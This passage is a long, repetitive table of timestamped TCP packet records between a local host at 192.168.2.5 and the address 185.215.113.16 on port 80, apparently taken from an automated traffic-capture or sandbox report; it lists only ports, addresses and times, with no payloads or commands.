Jul 26, 2024 17:56:21.011317015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011328936 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011337996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011349916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011358976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011370897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011385918 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011394024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011394024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011398077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011413097 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011425972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011428118 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011471033 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011471033 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011754036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011765957 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011776924 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011810064 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011810064 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011898041 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011909008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011918068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011928082 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011938095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011949062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011957884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011969090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011979103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011986017 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011986017 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011991978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011997938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012034893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012047052 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012048006 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012048006 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012057066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012068033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012074947 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012078047 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012089968 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012100935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012110949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012120962 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012125969 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012125969 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012131929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012147903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012161970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012161970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012187958 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012645006 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012655973 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012665987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012682915 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012693882 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012698889 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012706995 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012720108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012731075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012741089 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012741089 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012742043 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012753010 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012764931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012777090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012788057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.012813091 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012814045 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.012846947 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074147940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074161053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074172020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074209929 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074374914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074387074 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074398041 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074424028 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074424028 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074495077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074505091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074516058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074527979 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074537039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074537039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074630022 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074656963 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074666023 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074676991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074692965 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074709892 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074862957 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074878931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074888945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074901104 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074911118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074920893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074932098 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074943066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074953079 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074953079 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.074954033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074968100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.074985027 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.075006008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.075006008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.075052977 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.075061083 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.075134039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.075206995 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.075243950 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.075253963 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.075265884 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.075283051 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.075377941 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.075377941 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.078497887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078561068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078571081 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078609943 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.078639030 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078649044 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078659058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078670025 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078675032 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.078679085 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078721046 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.078721046 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.078892946 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078902960 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078912020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078922033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078931093 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078941107 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078944921 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.078955889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078967094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078977108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.078982115 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.078982115 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.078986883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.079037905 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.079037905 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.079168081 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.079176903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.079186916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.079243898 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.079243898 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.088903904 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.088922977 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.088933945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089015007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089015007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089045048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089055061 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089065075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089076042 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089138031 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089138031 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089215040 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089226007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089235067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089262009 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089287043 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089287043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089287043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089312077 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089314938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089338064 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089356899 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089356899 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089359045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089381933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089401960 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089401960 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089410067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089431047 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089435101 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089445114 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089464903 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089464903 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089474916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.089519024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.089519024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.095913887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.095925093 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.095937014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096016884 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096016884 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096076965 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096101999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096122026 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096138000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096148968 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096159935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096170902 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096187115 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096187115 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096195936 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096219063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096244097 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096244097 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096247911 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096259117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096282959 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096302986 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096302986 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096306086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096317053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096337080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096354961 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096354961 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096369028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096380949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096391916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096404076 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096404076 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096446991 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096446991 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096618891 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096636057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096647024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096669912 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096681118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096693039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096693039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096704960 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096726894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096750975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096755028 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096755028 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096764088 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096782923 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096803904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096803904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096826077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096826077 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096837997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096856117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096879959 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096899986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096910000 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096910000 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096924067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096937895 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096937895 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.096946955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096956968 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096981049 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.096992970 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.097007990 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.097007990 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.097052097 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.097052097 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162446022 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162475109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162487984 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162511110 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162523031 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162535906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162547112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162561893 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162580967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162590981 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162600994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162615061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162623882 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162645102 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162645102 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162658930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162678003 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162683010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162688971 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162731886 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162735939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162745953 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162746906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162787914 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162823915 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162834883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162846088 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162851095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162859917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162870884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162894964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162914991 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162914991 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162926912 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162940025 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162950039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162975073 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162975073 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.162985086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.162996054 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.163007021 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.163026094 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.163028955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.163053989 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.163058043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.163095951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.163095951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167361975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167381048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167392969 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167431116 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167479038 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167485952 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167495966 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167505980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167517900 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167540073 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167584896 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167584896 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167623997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167634964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167644978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167656898 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167679071 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167694092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167694092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167742014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167752981 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167757034 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167763948 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167776108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.167820930 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.167820930 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.168020964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.168031931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.168042898 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.168046951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.168051958 CEST	80	49705	185.215.113.16	192.168.2.5
